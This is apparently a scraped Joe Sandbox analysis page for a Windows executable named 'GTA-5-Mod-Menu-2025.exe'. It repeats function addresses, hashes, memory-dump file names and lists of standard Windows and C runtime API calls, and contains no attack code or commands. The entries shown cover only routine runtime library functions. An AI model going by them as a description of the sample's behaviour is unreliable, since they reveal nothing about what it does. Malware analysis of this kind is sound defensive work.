Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
Instruction ID: d5b55b0b8cb1552bb51935a115e20e61b6a0fea8e574afa80352531ecc35bdf4
Opcode Fuzzy Hash: edf93fba279839227daa040a9b069bd2020f08c679034ffdb873340300774f03
Instruction Fuzzy Hash: A541E434E006189BDF11EF68CC80ADEBBA5FF46324F148156E8159B352D739EA01EF92

Function 00FA2E5C Relevance: 9.3, APIs: 6, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9adebf9683660455a4d8c70e7b38d8cda70925b854ddf81af821773a1889c154
Instruction ID: 91c069a3b2c4bd251f775bd82e6405f913a325666f0f3183bfd9b49db4c83746
Opcode Fuzzy Hash: 9adebf9683660455a4d8c70e7b38d8cda70925b854ddf81af821773a1889c154
Instruction Fuzzy Hash: E3B1D2B5E0424AAFEF11DFA9CC81BAEBBB1BF46314F144158F40197292C7759E41EBA0

Function 00F9442D Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00F94424,00F8A93D,00F89B94), ref: 00F9443B
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F94449
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F94462
SetLastError.KERNEL32(00000000,00F94424,00F8A93D,00F89B94), ref: 00F944B4

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
Instruction ID: 49382c49d4f6112997bfa1b71997e8f701cff1eade1f30c6105a9ea15005266a
Opcode Fuzzy Hash: 19bfe50721451d14acfc7d273b515eb61d50a6a59e20d58bcfc0939637f310da
Instruction Fuzzy Hash: 0801D43350A71A6EBF256A79BCC5E2B3684EB61775720033AFD10951E1EF159C027640

Function 00F94D0C Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 00F94E2B
CallUnexpected.LIBVCRUNTIME ref: 00F950A4

Strings

csm, xrefs: 00F94D49
csm, xrefs: 00F94E62
csm, xrefs: 00F94DB6

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: CallUnexpectedtype_info::operator==
String ID: csm$csm$csm
API String ID: 2673424686-393685449
Opcode ID: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
Instruction ID: 8e1b621ca649cef9029f0863a6ef52fe32879a76698721b42964529bdb798b96
Opcode Fuzzy Hash: 1d0b69a17d2c7afb6b6fd11eb3136ab9ed5bb7eadb4d43e1719054a255dad67d
Instruction Fuzzy Hash: 3DB18E71C0020ADFEF25EFA4C841DAEB7B5BF24310B14456AE9156B212D335EA52EF91

Function 00F8F1B8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,EDB057DF,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F1ED
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00F8F1FF
FreeLibrary.KERNEL32(00000000,?,?,00000000,00FA5644,000000FF,?,00F8F279,00F8F160,?,00F8F315,00000000), ref: 00F8F221

Strings

mscoree.dll, xrefs: 00F8F1E6
CorExitProcess, xrefs: 00F8F1F7

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
Instruction ID: f36bc089717ac345db1de9b5ae15ef30cd40ac21a63e2d25e8d9785aba7ace64
Opcode Fuzzy Hash: d76dfb3c27f8d06555b6f2c8f19b9beb478da1d0858dfeb99062b7dbed283b07
Instruction Fuzzy Hash: 5A01A2B594061DAFDB119F50DC49FEEBBF8FB05B21F000625E811E22D0DB789900EB90

Function 00F877B2 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00F877B9
std::_Lockit::_Lockit.LIBCPMT ref: 00F877C4
std::_Lockit::~_Lockit.LIBCPMT ref: 00F87832

Part of subcall function 00F876AF: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00F876C7

std::locale::_Setgloballocale.LIBCPMT ref: 00F877DF
_Yarn.LIBCPMT ref: 00F877F5

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
Instruction ID: 5f04daa246362c1e49661ae77f31e37cde3b2c594a63e0848c4e07d747094a87
Opcode Fuzzy Hash: d3c4ef334024c25fc6306221d53b2f6ede452d3747d8e27b709c4b7f91bb258c
Instruction Fuzzy Hash: E601BCB5A142148BC706FF20CC956BDBBA1BFC5350B284109E80257382CF38AE02EBD1

Function 00F9F670 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC), ref: 00F9F67D
GetLastError.KERNEL32(?,00F9F70C,00000000,?,00FB1E20,?,?,?,00F9F643,00000004,InitializeCriticalSectionEx,00FA90D4,00FA90DC,00000000,?,00F9535C), ref: 00F9F687
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00F9F6AF

Strings

api-ms-, xrefs: 00F9F694

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
Instruction ID: e6596e05a9302da43d67098b527185de99e0bdd205619c727939c85c7b77bc18
Opcode Fuzzy Hash: 39a924ea26b3926f540d38970971b565e9e49389cba57a293815af76abbfa807
Instruction Fuzzy Hash: 30E04F71B8430DB7FF201B60EC0AB693F559B11B62F544430F90CE84F1EBA6E854B945

Function 00F9D70E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(EDB057DF,00000000,00000000,?), ref: 00F9D771

Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F9D9C3
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F9DA09
GetLastError.KERNEL32 ref: 00F9DAAC

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
Instruction ID: 6e24bfb7eaafa703dd8b1425dd5af7d625bf63d35ad0a24a14d32e17dd1e8ae1
Opcode Fuzzy Hash: 036b815668dc472ea77d01318cd017024e5511eec4d354f28b551bfe50ec5e13
Instruction Fuzzy Hash: 60D17BB5D042489FEF15CFE8C880AEDBBB5FF09314F28416AE456EB352D634A942DB50

Function 00F94A33 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00F94AFA
___AdjustPointer.LIBCMT ref: 00F94B1D
___AdjustPointer.LIBCMT ref: 00F94BB9

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
Instruction ID: f13ffd7b116ff19730d926e84be091ed8e0e8163593eccee758490b76470b9b7
Opcode Fuzzy Hash: d306b10ba91bb4f0dec3dabd3faa357e8787cce7fbfdc4750acfbafb675266e9
Instruction Fuzzy Hash: AE51E172A05A069FFF289F10D891FAAB3A4FFA0320F144529E90587291E735FC42E794

Function 00F9B536 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B59A
__dosmaperr.LIBCMT ref: 00F9B5A1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00F9B5DB
__dosmaperr.LIBCMT ref: 00F9B5E2

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
Instruction ID: e0eec8eb89800de93fd39828cfc59094b0350c48782b5ca0a9c1aa83d29ea103
Opcode Fuzzy Hash: 6f85fc8f5932b75ae6a67a07ea3930d0a76eeecb53b5eaa1e01ccae440ea86b5
Instruction Fuzzy Hash: 9A21C871A00209EFBF10AF67ED8196BB7A9FF043657154428F819D7150DB34ED40A7A0

Function 00F8C9D2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
Instruction ID: 85ad501fe76829fd42923ac86da5e1ed670a693b04234a59588ef19df9057b5f
Opcode Fuzzy Hash: 5ced1a7b8a919bc27145d7c81f21fdc9ef9a5527aa2a86eaa76612e3dac3d99b
Instruction Fuzzy Hash: 3C215E72A0020AAF9B24FF759C919AA77A9FF043647104525F91AD7650D738EC40A7F0

Function 00F9C92E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00F9C936

Part of subcall function 00F957C1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00F96F95,?,00000000,-00000008), ref: 00F95822

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C96E
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00F9C98E

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: ff3a5e6e9aed9148fdad7251598275df432e36680a94ae6e8fbb3ed8b733e06a
Instruction ID: 22f883ed6aac41a8d4fd915d244d43c97afd3ea3460bb2fcb5976f8b29e555f3
Opcode Fuzzy Hash: ff3a5e6e9aed9148fdad7251598275df432e36680a94ae6e8fbb3ed8b733e06a
Instruction Fuzzy Hash: AD1184F2901619BFBF1227B59C89C7F7EACDE867A47500525F906D1101FE289E00B6F5

Function 00FA4450 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000), ref: 00FA4467
GetLastError.KERNEL32(?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?,?,00F9D446,?), ref: 00FA4473

Part of subcall function 00FA44D0: CloseHandle.KERNEL32(FFFFFFFE,00FA4483,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?,?), ref: 00FA44E0

___initconout.LIBCMT ref: 00FA4483

Part of subcall function 00FA44A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00FA4441,00FA398C,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA44B8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00FA399F,00000000,00000001,?,?,?,00F9DB00,?,00000000,00000000,?), ref: 00FA4498

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
Instruction ID: a56da8238d4c67e4c97c97fc0520322a046aabda7e583ee31901e962e1f3dbd7
Opcode Fuzzy Hash: 52d5598eae1b06170174b5319b6b8c2e4e2f41a7b63479ba8ae684896df91151
Instruction Fuzzy Hash: B0F0307640021CBFCF225F91EC48A9A3F26FB8E3B1F514020FE0896130C7729820BB90

Function 00F9A0E6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F9590A: GetLastError.KERNEL32(00000000,?,00F97C8D), ref: 00F9590E
Part of subcall function 00F9590A: SetLastError.KERNEL32(00000000,?,?,00000028,00F91F53), ref: 00F959B0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?,?), ref: 00F9A1A5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00F8F7C9,?,?,?,00000055,?,-00000050,?,?), ref: 00F9A1DC

Strings

utf8, xrefs: 00F9A2AE

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
Instruction ID: fc779d9721de02147df9c86ccca348a8b832f2456aaf1e484bce7ab526278670
Opcode Fuzzy Hash: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
Instruction Fuzzy Hash: AB512871A00305AAFF29AB748C42FB673A8EF45720F140429F5559B181FB75D980BBE3

Function 00F95130 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00F95031,?,?,00000000,00000000,00000000,?), ref: 00F95155

Strings

RCC, xrefs: 00F9516F
MOC, xrefs: 00F95167

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
Instruction ID: 15b4edef40b31ab67fafd0b017be3f3827c9f1472f3629d8044dee6645c1a279
Opcode Fuzzy Hash: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
Instruction Fuzzy Hash: 44417931D00609AFEF16DF98DC81AEE7BB5FF48714F184069FA0567211D335A991EB50

Function 00F9499C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00F94C13

Strings

csm, xrefs: 00F94CA6
csm, xrefs: 00F94C35

Memory Dump Source

Source File: 00000000.00000002.2098052251.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true

Associated: 00000000.00000002.2098028366.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098080588.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098197533.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098214655.0000000000FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098233003.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2098252311.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f80000_GTA-5-Mod-Menu-2025.jbxd

Similarity

API ID: ___except_validate_context_record
String ID: csm$csm
API String ID: 3493665558-3733052814
Opcode ID: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
Instruction ID: 301ca63cc9da68eba751d3467e0e8fd9d4a6b1bca96fe5e9c9a4ceb3024aa40d
Opcode Fuzzy Hash: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
Instruction Fuzzy Hash: 8331CF76801218AFEF268F50DC44D6A7B65FF29325B18825AF8545A121C332ECA3FF91

Analysis Process: GTA-5-Mod-Menu-2025.exePID: 64, Parent PID: 5276COMMON

Non-executed Functions

Function 00F9B177 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B210
GetLocaleInfoW.KERNEL32(?,20001004,00F9AB2D,00000002,00000000,?,?,?,00F9AB2D,?,00000000), ref: 00F9B239
